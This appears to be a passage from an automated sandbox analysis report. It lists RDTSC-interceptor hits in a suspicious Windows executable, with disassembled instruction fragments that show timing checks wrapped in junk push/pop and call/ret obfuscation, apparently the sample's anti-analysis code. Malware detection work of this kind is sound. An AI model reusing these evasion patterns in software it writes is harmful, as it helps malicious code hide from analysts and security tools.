                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65398C second address: 653A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5938558A9Bh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5938558A98h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F5938558A98h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 xor dword ptr [ebp+122D2D88h], edx 0x0000004e push 00000000h 0x00000050 xor dword ptr [ebp+122D2308h], esi 0x00000056 xchg eax, ebx 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 653A0A second address: 653A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 653A0E second address: 653A20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jns 00007F5938558A96h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6587B3 second address: 6587B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6596E5 second address: 6596E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6596E9 second address: 6596F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6596F3 second address: 659754 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F5938558AA1h 0x00000011 nop 0x00000012 mov bx, CC74h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F5938558A98h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 call 00007F5938558A9Eh 0x00000037 mov di, 2801h 0x0000003b pop edi 0x0000003c push 00000000h 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 ja 00007F5938558A96h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65C848 second address: 65C84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65C84C second address: 65C869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65C869 second address: 65C8EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jo 00007F593855EEE6h 0x00000011 jmp 00007F593855EEF9h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F593855EEE8h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov dword ptr [ebp+12456FBCh], edx 0x00000038 jc 00007F593855EEECh 0x0000003e mov ebx, dword ptr [ebp+122D185Fh] 0x00000044 mov ebx, dword ptr [ebp+124468B8h] 0x0000004a push 00000000h 0x0000004c mov bx, di 0x0000004f sub dword ptr [ebp+122D367Fh], eax 0x00000055 push eax 0x00000056 pushad 0x00000057 jmp 00007F593855EEEDh 0x0000005c push eax 0x0000005d push edx 0x0000005e jnl 00007F593855EEE6h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65C8EF second address: 65C8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65DA46 second address: 65DA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 654345 second address: 65434B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65E924 second address: 65E928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65E928 second address: 65E938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F5938558A96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65E938 second address: 65E990 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F593855EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F593855EEE8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F593855EEE8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D21C2h], eax 0x0000004a xchg eax, esi 0x0000004b push esi 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pop edi 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6598FE second address: 659902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 659902 second address: 659908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 659908 second address: 65990E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65CAF0 second address: 65CB12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F593855EEEAh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65CB12 second address: 65CB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5938558A96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65CB1C second address: 65CB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65F903 second address: 65F90A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65F90A second address: 65F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007F593855EEF4h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65F91C second address: 65F990 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F5938558A98h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov bl, ch 0x00000027 push 00000000h 0x00000029 jbe 00007F5938558A9Ch 0x0000002f mov dword ptr [ebp+122D266Ah], edx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F5938558A98h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 jmp 00007F5938558AA0h 0x00000056 push eax 0x00000057 push ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65F990 second address: 65F994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65EB16 second address: 65EB1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65EB1A second address: 65EB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 661A2D second address: 661A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 661A31 second address: 661A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65EB23 second address: 65EBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F5938558A9Ch 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F5938558A98h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D2891h] 0x0000002d push dword ptr fs:[00000000h] 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F5938558A98h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov dword ptr fs:[00000000h], esp 0x00000055 jmp 00007F5938558AA1h 0x0000005a mov eax, dword ptr [ebp+122D0BE5h] 0x00000060 movzx ebx, di 0x00000063 push FFFFFFFFh 0x00000065 mov dword ptr [ebp+122D1C9Ch], eax 0x0000006b nop 0x0000006c jmp 00007F5938558A9Bh 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jno 00007F5938558A9Ch 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65FB41 second address: 65FB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65FB45 second address: 65FB52 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65FB52 second address: 65FB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 66491F second address: 664937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5938558AA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 664937 second address: 66495B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F593855EEECh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6661D1 second address: 6661D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6661D7 second address: 6661DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6670F1 second address: 667112 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5938558AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 667112 second address: 66712D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F593855EEF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 66712D second address: 667182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5938558A98h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 xor ebx, 5649079Ah 0x00000028 mov bx, A60Bh 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+12480E30h], edi 0x00000034 push 00000000h 0x00000036 call 00007F5938558AA0h 0x0000003b movzx ebx, dx 0x0000003e pop ebx 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 push ebx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 667182 second address: 667188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 667188 second address: 667199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F5938558A98h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 660AE7 second address: 660B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, dx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F593855EEE8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub dword ptr [ebp+12465E7Fh], edx 0x00000034 jng 00007F593855EEECh 0x0000003a mov edi, dword ptr [ebp+122D2A51h] 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F593855EEE8h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000016h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 mov ebx, dword ptr [ebp+122D2795h] 0x00000067 mov eax, dword ptr [ebp+122D0109h] 0x0000006d mov dword ptr [ebp+1246624Fh], edx 0x00000073 and edi, 31AD2C94h 0x00000079 push FFFFFFFFh 0x0000007b and bx, 8582h 0x00000080 push eax 0x00000081 push ebx 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 popad 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6680A9 second address: 6680AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 662B0C second address: 662B9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F593855EEF9h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov bl, 9Bh 0x00000012 pushad 0x00000013 and si, F785h 0x00000018 add dl, FFFFFFC0h 0x0000001b popad 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov ebx, dword ptr [ebp+122D2ABDh] 0x00000029 jne 00007F593855EEEEh 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 call 00007F593855EEEEh 0x0000003b push esi 0x0000003c or bx, D8F9h 0x00000041 pop ebx 0x00000042 pop edi 0x00000043 mov eax, dword ptr [ebp+122D00A5h] 0x00000049 mov di, D954h 0x0000004d add edi, dword ptr [ebp+122D2410h] 0x00000053 push FFFFFFFFh 0x00000055 mov ebx, dword ptr [ebp+122D20E0h] 0x0000005b mov ebx, dword ptr [ebp+122D2A6Dh] 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 jbe 00007F593855EEE6h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6680AE second address: 6680B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 662B9C second address: 662BAA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F593855EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 662BAA second address: 662BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 662BAE second address: 662BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6673C3 second address: 6673C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 669055 second address: 669062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 669062 second address: 669066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 669066 second address: 66906C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 66906C second address: 669072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6673C9 second address: 6673CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 669072 second address: 669076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6681A1 second address: 6681C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F593855EEEEh 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F593855EEEFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6681C7 second address: 6681D1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5938558A9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 66D2EB second address: 66D2FD instructions: 0x00000000 rdtsc 0x00000002 js 00007F593855EEECh 0x00000008 jo 00007F593855EEE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672AA1 second address: 672AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672AA5 second address: 672ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F593855EEE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672ABE second address: 672ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5938558A9Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672C4F second address: 672C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672C53 second address: 672C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672C57 second address: 672C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672C5D second address: 672C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5938558A9Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672F53 second address: 672F62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F593855EEE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672F62 second address: 672F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 672F6B second address: 672F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F593855EEF0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 679EA2 second address: 679EA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 679FB7 second address: 679FDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F593855EEEDh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 je 00007F593855EEFEh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67A1A8 second address: 67A1AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E2A1 second address: 67E2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 67E2A5 second address: 67E2BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5938558AA4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
